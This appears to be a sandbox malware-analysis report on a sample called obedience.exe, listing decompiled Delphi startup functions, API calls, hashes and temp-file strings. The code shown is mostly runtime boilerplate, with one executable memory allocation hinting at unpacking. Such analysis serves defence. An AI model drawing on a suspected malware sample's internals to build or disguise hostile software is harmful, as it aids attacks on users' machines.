      • String ID: C:\Users\user\AppData\Local\Temp\handkerchief.dat$C:\Users\user\AppData\Local\Temp\obedience.exe$handkerchief.dat$pedetdata
      • API String ID: 3594156554-2664055295
      • Opcode ID: 613ba6d6eec403316f5549ba8b0815ba929d8e14258bf57e70def600013f462c
      • Instruction ID: b2f10d5ef7ac0baf44385fc5b947eab740a7f852cdb46c717dd163760176df5a
      • Opcode Fuzzy Hash: 613ba6d6eec403316f5549ba8b0815ba929d8e14258bf57e70def600013f462c
      • Instruction Fuzzy Hash: 4391B270614742DFD750CFA8C885B9FB7E8BF86308F15892CE6958B281E730D54ADB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004632B0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 132windowregistryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 42%
      			E004632B0(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				void* _t71;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_t71 = __ecx;
				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x463451);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x463458);
					return E00404A40( &_v48);
				}
				_t22 =  *0x48f8c0; // 0x490048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00423758(E00463830, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x48ef0c = L00407550;
				_t26 =  *0x48ef2c; // 0x462f84
				_t27 =  *0x490664; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x490664; // 0x400000
					 *0x48ef18 = _t62;
					_t88 = RegisterClassA(0x48ef08);
					if(_t88 == 0) {
						_t64 =  *0x48f5e4; // 0x423ae8
						E00406A3C(_t64, _t71,  &_v48);
						E0040CBEC(_v48, 1);
						E004043D0();
					}
				}
				_t29 =  *0x48f6b0; // 0x490904
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x48f6b0; // 0x490904
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x490664; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x84140045
				_t39 = E00404F00( *_t7);
				_t40 =  *0x48ef2c; // 0x462f84, executed
				_t41 = E00407B24(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45b290
				E00404A40(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10c80000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x48f73c; // 0x490ae0
				if( *_t47 != 0) {
					_t55 = E00463F30(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E00463F30(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x48f73c; // 0x490ae0
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}





























      0x004632b0
      0x004632b9
      0x004632bc
      0x004632c0
      0x004632c1
      0x004632c6
      0x004632c9
      0x004632d3
      0x0046343b
      0x0046343d
      0x00463440
      0x00463443
      0x00463450
      0x00463450
      0x004632d9
      0x004632e1
      0x00000000
      0x00000000
      0x004632ed
      0x004632f2
      0x004632fa
      0x00463303
      0x00463309
      0x00463316
      0x00463318
      0x0046331d
      0x0046332c
      0x0046332f
      0x00463334
      0x00463339
      0x00463348
      0x0046334d
      0x0046334d
      0x0046332f
      0x00463354
      0x0046335d
      0x0046335f
      0x00463361
      0x00463361
      0x00463367
      0x00463370
      0x00463372
      0x00463374
      0x00463374
      0x00463377
      0x00463378
      0x0046337a
      0x0046337c
      0x0046337e
      0x00463380
      0x00463385
      0x00463386
      0x00463388
      0x0046338e
      0x0046339a
      0x0046339f
      0x004633a4
      0x004633a7
      0x004633ad
      0x004633b2
      0x004633b9
      0x004633bf
      0x004633c3
      0x004633c8
      0x004633d0
      0x004633d4
      0x004633e1
      0x004633e5
      0x004633ec
      0x004633f4
      0x004633f8
      0x004633f8
      0x004633ff
      0x00463408
      0x00463412
      0x0046341f
      0x00463424
      0x0046342c
      0x00463436
      0x00463436
      0x00000000

      APIs
        • Part of subcall function 00423758: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042377F
      • GetClassInfoA.USER32 ref: 0046330F
      • RegisterClassA.USER32 ref: 00463327
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      • SetWindowLongA.USER32 ref: 004633C3
      • SendMessageA.USER32 ref: 004633E5
      • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10C80000,0045B204), ref: 004633F8
      • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463403
      • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463412
      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 0046341F
      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463436
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
      • String ID: Pu@$TsA$I$:B
      • API String ID: 2103932818-4014100627
      • Opcode ID: 5675b7ad24d272adfe38eb4a866342c0b0a94ea0e50764adf944712c1cdbd5b9
      • Instruction ID: 3a5adff0ba3c83bfe3925a1dc9cf6b8907eacc9c916d56076b9719665dda5c00
      • Opcode Fuzzy Hash: 5675b7ad24d272adfe38eb4a866342c0b0a94ea0e50764adf944712c1cdbd5b9
      • Instruction Fuzzy Hash: E3414071B442806FE711EF69DC82F5A33A8AB45704F54447AFA00EB2D2EB78BD00872D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044FFC4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 86%
      			E0044FFC4(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x45013c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A164("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A94(0x490aec, _v8);
				_t25 =  *0x490aec; // 0x2480dd0
				_t27 = GlobalAddAtomA(E00404F00(_t25)); // executed
				 *0x490ae8 = _t27;
				_t29 =  *0x490664; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A164("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A94(0x490af0, _v20);
				_t35 =  *0x490af0; // 0x2480dec
				 *0x490aea = GlobalAddAtomA(E00404F00(_t35));
				_t38 =  *0x490af0; // 0x2480dec
				 *0x490af4 = RegisterClipboardFormatA(E00404F00(_t38));
				 *0x490b2c = E00419F14(1);
				E0044FBC8();
				 *0x490adc = E0044F9F0(1, 1);
				_t47 = E00461DA8(1, __edi);
				_t78 =  *0x48f9b8; // 0x490b80
				 *_t78 = _t47;
				_t49 = E00462F94(0, 1);
				_t80 =  *0x48f840; // 0x490b7c
				 *_t80 = _t49;
				_t50 =  *0x48f840; // 0x490b7c
				E00464D04( *_t50, 1);
				_t53 =  *0x43efd4; // 0x43efd8
				E00419430(_t53, 0x441a0c, 0x441a1c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x48ebd4 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x450143);
				E00404A40( &_v20);
				return E00404A40( &_v8);
			}

























      0x0044ffcd
      0x0044ffd0
      0x0044ffd5
      0x0044ffd6
      0x0044ffdb
      0x0044ffde
      0x0044ffea
      0x0044ffed
      0x0044fffb
      0x00450008
      0x0045000d
      0x00450018
      0x0045001d
      0x00450027
      0x0045002c
      0x0045002f
      0x00450038
      0x0045003b
      0x0045004c
      0x00450059
      0x0045005e
      0x0045006e
      0x00450074
      0x00450084
      0x00450095
      0x0045009a
      0x004500ab
      0x004500b9
      0x004500be
      0x004500c4
      0x004500cf
      0x004500d4
      0x004500da
      0x004500dc
      0x004500e5
      0x004500f4
      0x004500f9
      0x00450108
      0x0045010c
      0x00450119
      0x00450119
      0x00450120
      0x00450123
      0x00450126
      0x0045012e
      0x0045013b

      APIs
      • GetCurrentProcessId.KERNEL32(?,00000000,0045013C), ref: 0044FFE5
      • GlobalAddAtomA.KERNEL32 ref: 00450018
      • GetCurrentThreadId.KERNEL32 ref: 00450033
      • GlobalAddAtomA.KERNEL32 ref: 00450069
      • RegisterClipboardFormatA.USER32(00000000), ref: 0045007F
        • Part of subcall function 00419F14: RtlInitializeCriticalSection.KERNEL32(0041747C,?,?,00423A41,00000000,00423A65), ref: 00419F33
        • Part of subcall function 0044FBC8: SetErrorMode.KERNEL32(00008000), ref: 0044FBE1
        • Part of subcall function 0044FBC8: GetModuleHandleA.KERNEL32(USER32,00000000,0044FD2E,?,00008000), ref: 0044FC05
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044FC12
        • Part of subcall function 0044FBC8: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044FD2E,?,00008000), ref: 0044FC2E
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044FC50
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 0044FC65
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044FC7A
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044FC8F
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 0044FCA4
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 0044FCB9
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044FCCE
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044FCE3
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044FCF8
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0044FD0D
        • Part of subcall function 0044FBC8: SetErrorMode.KERNEL32(?,0044FD35,00008000), ref: 0044FD28
        • Part of subcall function 00461DA8: GetKeyboardLayout.USER32 ref: 00461DED
        • Part of subcall function 00461DA8: 73BEAC50.USER32(00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E42
        • Part of subcall function 00461DA8: 73BEAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E4C
        • Part of subcall function 00461DA8: 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?), ref: 00461E57
        • Part of subcall function 00462F94: LoadIconA.USER32(00400000,MAINICON), ref: 00463079
        • Part of subcall function 00462F94: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 004630AB
        • Part of subcall function 00462F94: OemToCharA.USER32 ref: 004630BE
        • Part of subcall function 00462F94: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000), ref: 0046310B
        • Part of subcall function 00462F94: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?), ref: 00463111
      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00450103
      • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00450114
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$ttA
      • API String ID: 1368734802-283336520
      • Opcode ID: 8138e431131322c61892cc95c64641ff2333261e0fd24f17018ba8d4d6d6d2ed
      • Instruction ID: 391add8d6df546983462eea8a1e4386065a5c7db987ae060372cebaeae235c7a
      • Opcode Fuzzy Hash: 8138e431131322c61892cc95c64641ff2333261e0fd24f17018ba8d4d6d6d2ed
      • Instruction Fuzzy Hash: E6413074A043459FCB00EFB5EC42A4E77A4EB59308B50853BF501E73A2DB79A9048B9E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004622CC Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 140registryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 351 4622cc-4622f6 352 4622fc-462337 call 403bc0 call 404a40 GetKeyboardLayoutList GetSystemDefaultLangID 351->352 353 46247d-46249b call 404a40 351->353 360 46246c-462478 call 41c0e8 352->360 361 46233d-462347 352->361 360->353 362 46234a-462356 call 44ff28 361->362 366 462358-462363 362->366 367 462369-462382 362->367 366->367 368 46245f-462466 366->368 369 462384-462387 367->369 370 462389 367->370 368->360 368->362 371 46238b-4623c8 call 40a0cc RegOpenKeyExA 369->371 370->371 374 462441-462457 RegCloseKey 371->374 375 4623ca-4623f0 RegQueryValueExA 371->375 375->374 376 4623f2-462429 call 404cb0 375->376 376->374 380 46242b-46243c call 404cb0 376->380 380->374
      C-Code - Quality: 79%
      			E004622CC(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr* _v28;
				struct HKL__* _v284;
				char _v540;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				int _t66;
				intOrPtr _t77;
				long _t81;
				long _t88;
				void* _t105;
				intOrPtr _t107;
				intOrPtr _t118;
				intOrPtr _t125;
				void* _t132;
				void* _t133;
				intOrPtr _t134;
				void* _t146;

				_t146 = __fp0;
				_t132 = _t133;
				_t134 = _t133 + 0xfffffd9c;
				_v616 = 0;
				_v8 = __eax;
				_push(_t132);
				_push(0x46249c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L15:
					_pop(_t118);
					 *[fs:eax] = _t118;
					_push(0x4624a3);
					return E00404A40( &_v616);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BC0(1);
					E00404A40(_v8 + 0x38);
					_t66 = GetKeyboardLayoutList(0x40,  &_v284);
					_v20 = GetSystemDefaultLangID() & 0x0000ffff;
					_t105 = _t66 - 1;
					if(_t105 < 0) {
						L14:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041C0E8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L15;
					} else {
						_v24 = _t105 + 1;
						_v28 =  &_v284;
						while(E0044FF28( *_v28) == 0 &&  *_v28 !=  *((intOrPtr*)(_v8 + 0x3c))) {
							_v28 = _v28 + 4;
							_t45 =  &_v24;
							 *_t45 = _v24 - 1;
							if( *_t45 != 0) {
								continue;
							} else {
								goto L14;
							}
							goto L16;
						}
						_push(_t132);
						_push(0x462458);
						_push( *[fs:edx]);
						 *[fs:edx] = _t134;
						_t77 =  *_v28;
						if(_t77 !=  *((intOrPtr*)(_v8 + 0x3c))) {
							_t107 = _t77;
						} else {
							_t20 =  &_v20; // 0x446f48
							_t107 =  *_t20;
						}
						_v612 = _t107;
						_v608 = 0;
						_t81 = RegOpenKeyExA(0x80000002, E0040A0CC( &_v604, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t146, 0), 0, 0x20019,  &_v16); // executed
						if(_t81 == 0) {
							_v12 = 0x100;
							_t88 = RegQueryValueExA(_v16, "layout text", 0, 0,  &_v540,  &_v12); // executed
							if(_t88 == 0) {
								E00404CB0( &_v616, 0x100,  &_v540);
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
								if( *_v28 ==  *((intOrPtr*)(_v8 + 0x3c))) {
									E00404CB0(_v8 + 0x38, 0x100,  &_v540);
								}
							}
						}
						_pop(_t125);
						 *[fs:eax] = _t125;
						_push(0x46245f);
						return RegCloseKey(_v16);
					}
				}
				L16:
			}



























      0x004622cc
      0x004622cd
      0x004622cf
      0x004622d8
      0x004622de
      0x004622e3
      0x004622e4
      0x004622e9
      0x004622ec
      0x004622f6
      0x0046247d
      0x00462485
      0x00462488
      0x0046248b
      0x0046249b
      0x004622fc
      0x0046230b
      0x00462314
      0x00462322
      0x00462331
      0x00462334
      0x00462337
      0x0046246c
      0x00462472
      0x00462478
      0x00000000
      0x0046233d
      0x0046233e
      0x00462347
      0x0046234a
      0x0046245f
      0x00462463
      0x00462463
      0x00462466
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00462466
      0x0046236b
      0x0046236c
      0x00462371
      0x00462374
      0x0046237a
      0x00462382
      0x00462389
      0x00462384
      0x00462384
      0x00462384
      0x00462384
      0x00462398
      0x0046239e
      0x004623c1
      0x004623c8
      0x004623ca
      0x004623e9
      0x004623f0
      0x00462403
      0x0046241b
      0x00462429
      0x0046243c
      0x0046243c
      0x00462429
      0x004623f0
      0x00462443
      0x00462446
      0x00462449
      0x00462457
      0x00462457
      0x00462337
      0x00000000

      APIs
      • GetKeyboardLayoutList.USER32(00000040,?,00000000,0046249C,?,02480E74,?,004624FD,00000000,?,00446EF3), ref: 00462322
      • GetSystemDefaultLangID.KERNEL32(00000040,?,00000000,0046249C,?,02480E74,?,004624FD,00000000,?,00446EF3), ref: 00462329
      • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004623C1
      • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,80000002,00000000), ref: 004623E9
      • RegCloseKey.ADVAPI32(?,0046245F), ref: 00462452
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseDefaultKeyboardLangLayoutListOpenQuerySystemValue
      • String ID: HoD$System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$tzA
      • API String ID: 34517754-2195660679
      • Opcode ID: bcd99a5c8c93ff9971ae5b3fd8698a95235a489e1aca05edaa7752c5ca1ddf37
      • Instruction ID: 3fbebc5d05554b2806ba6c1b55b389240d17e9f64fafa1af66ff3ea040d684e1
      • Opcode Fuzzy Hash: bcd99a5c8c93ff9971ae5b3fd8698a95235a489e1aca05edaa7752c5ca1ddf37
      • Instruction Fuzzy Hash: B5513074A04609EFDB10DF95C981B9EB7B5EB48304F5040A6EA04EB351EB78AE41CB55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00462F94 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 130windowCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 94%
      			E00462F94(void* __ecx, char __edx) {
				char _v5;
				char* _v12;
				char _v268;
				void* __ebx;
				void* __ebp;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t48;
				struct HINSTANCE__** _t58;
				struct HICON__* _t60;
				intOrPtr _t63;
				struct HINSTANCE__** _t65;
				CHAR* _t76;
				char* _t80;
				intOrPtr _t86;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t96;
				void* _t97;
				char _t99;
				void* _t111;
				void* _t112;

				_t99 = __edx;
				_t97 = __ecx;
				if(__edx != 0) {
					_t112 = _t112 + 0xfffffff0;
					_t44 = E00403F68(_t44, _t111);
				}
				_v5 = _t99;
				_t96 = _t44;
				E004226B0(_t97, 0);
				_t47 =  *0x48f794; // 0x48e470
				if( *((short*)(_t47 + 2)) == 0) {
					_t95 =  *0x48f794; // 0x48e470
					 *((intOrPtr*)(_t95 + 4)) = _t96;
					 *_t95 = 0x464734;
				}
				_t48 =  *0x48f86c; // 0x48e478
				if( *((short*)(_t48 + 2)) == 0) {
					_t94 =  *0x48f86c; // 0x48e478
					 *((intOrPtr*)(_t94 + 4)) = _t96;
					 *_t94 = E0046492C;
				}
				 *((char*)(_t96 + 0x34)) = 0;
				 *((intOrPtr*)(_t96 + 0x90)) = E00403BC0(1);
				 *((intOrPtr*)(_t96 + 0xa8)) = E00403BC0(1);
				 *((intOrPtr*)(_t96 + 0x60)) = 0;
				 *((intOrPtr*)(_t96 + 0x84)) = 0;
				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
				 *((char*)(_t96 + 0x7c)) = 1;
				 *((intOrPtr*)(_t96 + 0x80)) = 0;
				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
				 *((char*)(_t96 + 0x88)) = 0;
				 *((char*)(_t96 + 0x9d)) = 1;
				 *((char*)(_t96 + 0xb4)) = 1;
				 *((intOrPtr*)(_t96 + 0x98)) = E0042C1B0(1);
				_t58 =  *0x48f690; // 0x49002c
				_t60 = LoadIconA( *_t58, "MAINICON"); // executed
				E0042C580(_t57, _t60);
				_t20 = _t96 + 0x98; // 0x736d
				_t63 =  *_t20;
				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
				 *((intOrPtr*)(_t63 + 0x10)) = 0x464f8c;
				_t65 =  *0x48f690; // 0x49002c
				GetModuleFileNameA( *_t65,  &_v268, 0x100);
				OemToCharA( &_v268,  &_v268);
				_v12 = E0040DA70( &_v268, _t97, 0x5c);
				if(_v12 != 0) {
					E00409A80( &_v268, _v12 + 1);
				}
				_v12 = E0040DAB8( &_v268, _t97, 0x2e);
				if(_v12 != 0) {
					 *_v12 = 0;
				}
				_t76 = CharNextA( &_v268); // executed
				CharLowerA(_t76);
				_t36 = _t96 + 0x8c; // 0x45b290
				E00404CB0(_t36, 0x100,  &_v268);
				_t80 =  *0x48f54c; // 0x490034
				if( *_t80 == 0) {
					E004632B0(_t96, _t96, 0x100); // executed
				}
				 *((char*)(_t96 + 0x59)) = 1;
				 *((char*)(_t96 + 0x5a)) = 1;
				 *((char*)(_t96 + 0x5b)) = 1;
				 *((char*)(_t96 + 0x9e)) = 1;
				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
				E00465168(_t96, 0x100);
				E00465B50(_t96);
				_t86 = _t96;
				if(_v5 != 0) {
					E00403FC0(_t86);
					_pop( *[fs:0x0]);
				}
				return _t96;
			}

























      0x00462f94
      0x00462f94
      0x00462fa1
      0x00462fa3
      0x00462fa6
      0x00462fa6
      0x00462fab
      0x00462fae
      0x00462fb4
      0x00462fb9
      0x00462fc3
      0x00462fc5
      0x00462fca
      0x00462fcd
      0x00462fcd
      0x00462fd3
      0x00462fdd
      0x00462fdf
      0x00462fe4
      0x00462fe7
      0x00462fe7
      0x00462fed
      0x00462ffd
      0x0046300f
      0x00463017
      0x0046301c
      0x00463022
      0x00463029
      0x00463030
      0x00463036
      0x0046303c
      0x00463043
      0x0046304a
      0x00463051
      0x00463066
      0x00463071
      0x00463079
      0x00463082
      0x00463087
      0x00463087
      0x0046308d
      0x00463090
      0x004630a3
      0x004630ab
      0x004630be
      0x004630d0
      0x004630d7
      0x004630e3
      0x004630e3
      0x004630f5
      0x004630fc
      0x00463101
      0x00463101
      0x0046310b
      0x00463111
      0x00463116
      0x00463127
      0x0046312c
      0x00463134
      0x00463138
      0x00463138
      0x0046313d
      0x00463141
      0x00463145
      0x00463149
      0x00463152
      0x0046315a
      0x00463161
      0x00463166
      0x0046316c
      0x0046316e
      0x00463173
      0x0046317a
      0x00463184

      APIs
      • LoadIconA.USER32(00400000,MAINICON), ref: 00463079
      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 004630AB
      • OemToCharA.USER32 ref: 004630BE
